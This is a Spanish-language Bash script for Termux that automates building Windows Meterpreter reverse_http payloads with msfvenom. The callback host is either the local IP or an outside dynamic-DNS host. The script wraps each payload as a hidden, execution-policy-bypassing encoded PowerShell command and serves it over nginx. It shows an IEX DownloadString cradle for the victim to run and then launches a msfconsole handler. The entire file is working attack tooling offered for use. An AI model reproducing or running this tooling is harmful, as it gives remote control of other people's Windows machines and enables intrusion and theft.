#! /bin/bash/

#ipp="$(curl ifconfig.co)"  > /dev/null 2>&1

############  Colores  #################
rojff='\033[1;31m'
rojx='\e[101m'
rojs='\e[41m'
roj='\033[31m'
ro2='\033[91m'
rojsub='\e[1;4;91m'

ver='\033[32m'
#ver0='\033[1;32m'
ve2='\033[92m'
#ve20='\033[1;32m'

ama='\033[33m'
amas='\033[1;4;33m'
am0='\033[1;33m'

azu='\033[34m'
az0='\033[1;34m'
neg='\e[1m'
pur='\033[35m'

cy='\033[36m'
#cy0='\033[1;36m'
##---------------
sub='\e[4m'
#fos='\e[5m'
gri='\e[2m'
#----------------
fin='\033[01;37m'
#----------------


######################################
#-------------------------------------------

########################### ip/red ####################

ip="$(ip route show|grep ' src ' |cut -d' ' -f9)"
#ant3=`netstat -r | grep "default" | awk {'print $8'}`
#nomred="$(nmcli c|sed -n '2p'|cut -d' ' -f1)"
#ipx=$(hostname -I)
#routt="$(ip route show|grep ' dhcp '|cut -d' ' -f3)"
#####################################

ppreg () {

echo  "──────────────
──────────────

░Ｐｕｅｒｔｏ░
   ᗪｅ░ＳｈｅｌｌＣｏｄｅ░"
   echo -n "    └──────╼#"
read p00r
echo "
--------------------------------------
--------------------------------------"

clear
echo "

░█▀▀█ █▀▀█ █▀▀ █▀▀█ █▀▀▄ █▀▀▄ █▀▀█ ▄ 
░█─── █▄▄▀ █▀▀ █▄▄█ █──█ █──█ █──█ ─ 
░█▄▄█ ▀─▀▀ ▀▀▀ ▀──▀ ▀──▀ ▀▀▀─ ▀▀▀▀ ▀ 

$ama░█▀▀█ █▀▀█ █──█ █── █▀▀█ █▀▀█ █▀▀▄ $fin
$ama░█▄▄█ █▄▄█ █▄▄█ █── █──█ █▄▄█ █──█ $fin
$ama░█─── ▀──▀ ▄▄▄█ ▀▀▀ ▀▀▀▀ ▀──▀ ▀▀▀─$fin

"
touch /data/data/com.termux/files/home/$p00r
} 




banner0 () {
	rm -f /data/data/com.termux/files/home/storage/downloads/xx0 > /dev/null 2>&1
#cd /data/data/com.termux/files/home/99/0/x1

	echo ""
clear
echo "
$ama 
 ╭━━━╮╱╱╱╱╭╮╱╱╭━╮╭━╮      
$ama ┃╭━╮┃╱╱╱╱┃┃╱╱╰╮╰╯╭╯  ░░$roj ▒█▄░▒█ █▀▀ █▀▀ █▀▀█ █▀▀█  $fin
$ama ┃┃╱╰╋━━┳━╯┣━━╮╰╮╭╯   ▀▀$roj ▒█▒█▒█ █▀▀ █░░ █▄▄▀ █▄▀█  $fin
$ama ┃┃╱╭┫╭╮┃╭╮┃┃━┫╭╯╰╮   ░░$roj ▒█░░▀█ ▀▀▀ ▀▀▀ ▀░▀▀ █▄▄█  $fin 
$ama ┃╰━╯┃╰╯┃╰╯┃┃━╋╯╭╮╰╮  
 ╰━━━┻━━┻━━┻━━┻━╯    ╰━╯  $fin
$ama
P A Y L O A D ░$cy ＳｈｅｌｌＣｏｄｅ $fin

IEX (New-Object Net.WebClient).DownloadString
   
     ('http://localhost:2021/xx0')"
}


ppreg0 () {
echo "
$ama ᗪEᑎTᖇO ᗪE ᒪᗩ ᖇEᗪ$fin┌─┤$ama Windows_x32-bits....\033[32m1$fin
                 │
                 └─┤$ama Windows_x64-bits....\033[32m2$fin     

$roj ᖴᑌEᖇᗩ ᗪE ᒪᗩ ᖇEᗪ$fin┌─┤$roj Windows_x32-bits.....\033[32mx1$fin
                │
                └┤$roj Windows_x64-bits.....\033[32mx2$fin  
"
echo -n "───────────────┤"
read redd
case $redd in
  1 ) banner0;ddentr0x32;ven0m;serrv;enterx32;;
  2 ) banner0;ddentr0x64;ven0m;serrv;enterx64;;
  x1 ) banner0;ppreg;ffuera0x32;ven0m;;
  x2 ) banner0;ppreg;ffuera0x64;ven0m;;
  * ) sleep 0.6s; echo "[1;31m
 Opción incorrecta";sleep 1; clear; inici0;;
esac
}




ddentr0x32 () {   

echo "

░█▀▀█ █▀▀█ █▀▀ █▀▀█ █▀▀▄ █▀▀▄ █▀▀█ ▄ 
░█─── █▄▄▀ █▀▀ █▄▄█ █──█ █──█ █──█ ─ 
░█▄▄█ ▀─▀▀ ▀▀▀ ▀──▀ ▀──▀ ▀▀▀─ ▀▀▀▀ ▀ 

$ama░█▀▀█ █▀▀█ █──█ █── █▀▀█ █▀▀█ █▀▀▄ $fin
$ama░█▄▄█ █▄▄█ █▄▄█ █── █──█ █▄▄█ █──█ $fin
$ama░█─── ▀──▀ ▄▄▄█ ▀▀▀ ▀▀▀▀ ▀──▀ ▀▀▀─$fin


"
 msfvenom -p windows/meterpreter/reverse_http LHOST=$ip LPORT=1985 HandlerSSLCert=/data/data/com.termux/files/home/99/ban/www.gmail.com.pem StagerVerifySSLCert=true -f psh-cmd > /data/data/com.termux/files/home/99/0/x1/mtx.raw



}
ddentr0x64 () {   
  
echo "

░█▀▀█ █▀▀█ █▀▀ █▀▀█ █▀▀▄ █▀▀▄ █▀▀█ ▄ 
░█─── █▄▄▀ █▀▀ █▄▄█ █──█ █──█ █──█ ─ 
░█▄▄█ ▀─▀▀ ▀▀▀ ▀──▀ ▀──▀ ▀▀▀─ ▀▀▀▀ ▀ 

$ama░█▀▀█ █▀▀█ █──█ █── █▀▀█ █▀▀█ █▀▀▄ $fin
$ama░█▄▄█ █▄▄█ █▄▄█ █── █──█ █▄▄█ █──█ $fin
$ama░█─── ▀──▀ ▄▄▄█ ▀▀▀ ▀▀▀▀ ▀──▀ ▀▀▀─$fin


"
 msfvenom -p windows/x64/meterpreter/reverse_http LHOST=$ip LPORT=1985 HandlerSSLCert=/data/data/com.termux/files/home/99/ban/www.gmail.com.pem StagerVerifySSLCert=true -f psh-cmd > /data/data/com.termux/files/home/99/0/x1/mtx.raw
 }


ffuera0x32 () {    msfvenom -p windows/meterpreter/reverse_http LHOST=m4trix.sytes.net LPORT=$p00r HandlerSSLCert=/data/data/com.termux/files/home/99/ban/www.gmail.com.pem StagerVerifySSLCert=true -f psh-cmd > /data/data/com.termux/files/home/99/0/x1/mtx.raw
  }
  ffuera0x64 () {    msfvenom -p windows/x64/meterpreter/reverse_http LHOST=m4trix.sytes.net LPORT=$p00r HandlerSSLCert=/data/data/com.termux/files/home/99/ban/www.gmail.com.pem StagerVerifySSLCert=true -f psh-cmd > /data/data/com.termux/files/home/99/0/x1/mtx.raw
}


ven0m() {

 touch /data/data/com.termux/files/home/storage/downloads/xx0
  shellx=`cat /data/data/com.termux/files/home/99/0/x1/mtx.raw | awk {'print $12'}`
  echo "powershell.exe -nop -wind hidden -Exec Bypass -noni -enc $shellx" >> /data/data/com.termux/files/home/storage/downloads/xx0
  cd /data/data/com.termux/files/home/99/0/x1
  rm -f *.raw

#########################
bata="/data/data/com.termux/files/home/storage/downloads/xx0"
#clear 
  


                                            if [ -e $bata ]; then



                          echo " $ama       

  :::ＳｈｅｌｌＣｏｄｅ::::Ｃｒｅａｄｏ!!!
                          
                          "
                                            else
      echo  "       [☠] archivo.bat     -> Not Encontrado!"
                                            exit
                                            fi

}
serrv () {

echo "
$ama
  ΛᄃƬIVΛПDӨ... $fin
::Ｓｅｒｖｉｄｏｒ::$roj
  ᑎGIᑎ᙭ $fin


"
read pxxx
nginx
}


enterx64 () {
clear
    echo "

[$azu IEX (New-Object Net.WebClient).DownloadString
        ('http://$ip:2021/xx0')$fin]
   
    "
  msfconsole -x "use exploit/multi/handler;set PAYLOAD windows/x64/meterpreter/reverse_http;set LPORT 1985;set LHOST $ip;exploit"
} 

enterx32 () {
 clear
    echo "

[$azu IEX (New-Object Net.WebClient).DownloadString
        ('http://$ip:2021/xx0')$fin]
   
    "
  msfconsole -x "use exploit/multi/handler;set PAYLOAD windows/meterpreter/reverse_http;set LPORT 1985;set LHOST $ip;exploit"
 
}



#n0mb=$(zenity --title="☠ Ｕｓｕａｒｉｏ ☠" --text ":::Escribe tu Nombre de Usuario en GitHub:::" --entry --width 100) > /dev/null 2>&1

#ppsx=$(zenity  --file-selection --title="Selecciona un Archivo Para Subir a GitHub:::::::")  > /dev/null 2>&1
#ppsx=$(zenity  --file-selection --title="Selecciona un Archivo Para Subir a GitHub::::::: "--directory)  > /dev/null 2>&1

#read varr

#####################################
#    case $kaos in
#	     a ) clear; banne1;;
#	     z ) sleep 1; exit;;
#	     * ) sleep 1; echo "[1;31m
#  Opción incorrecta";sleep 1; clear; enterchaoss;;
#    esac
####################################
# > /dev/null 2>&1
#
###################################
#  if [ $varr = "1" ]; then
#clear
#	 echo "
#
#"
#else
#echo ""
#fi
####################################
banner0 && ppreg0
